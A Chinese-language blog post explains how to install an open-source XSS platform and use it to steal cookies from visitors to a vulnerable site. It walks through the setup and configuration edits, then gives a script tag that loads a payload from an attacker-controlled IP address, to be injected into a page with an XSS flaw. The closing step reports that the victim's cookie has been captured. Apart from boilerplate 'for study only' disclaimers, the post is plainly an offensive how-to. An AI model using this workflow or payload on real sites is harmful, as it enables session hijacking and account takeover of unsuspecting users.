XSS平台搭建及利用 - Kirin博客

XSS平台搭建及利用

作者: Bee

全网最全的网络资源分享网站

标签:

xss漏洞渗透

特别声明:部分文章为网络转载,资源使用一般不提供任何帮助,特殊资源除外,如有侵权请联系站长!请勿违法!本站文章仅供学习了解!技术无罪!

流量卡广告 Kirin影视 联系站长QQ

一、下载平台源码、拷贝到我们网站的根目录

https://github.com/anwilx/xss_platform

二、修改相关参数

1、config.php,数据库用户、密码、还有xss平台的访问路径

2、导入sql文件,测试的时候没法导入,所以就手动创建了数据库

新建数据库

打开xssplatform.sql,将里面的sql语句执行一遍

3、更新站点域名,将作者的域名替换,一共有四处

将module模块里"http://xsser.me"替换为"http://www.aiyouxss.com/xss");

4、修改authtest文件

三、平台利用

1、注册一个账户

2、创建一个项目

3、配置相关信息,根据需要,添加模块

4、复制script里面代码,插入到存在xss漏洞的页面

<script src=http://192.168.139.129/xss/E3vbsa></script>



5、打开xss平台,已获取对方cookie

禁止非法,后果自负

分享到:
加入交流群
未经允许不得转载:

作者: Bee, 转载或复制请以 超链接形式 并注明出处 Kirin博客
原文地址: 《XSS平台搭建及利用》 发布于2021-5-26

切换注册

登录

您也可以使用第三方帐号快捷登录

切换登录

注册

觉得文章有用就加入交流群吧

QQ扫一扫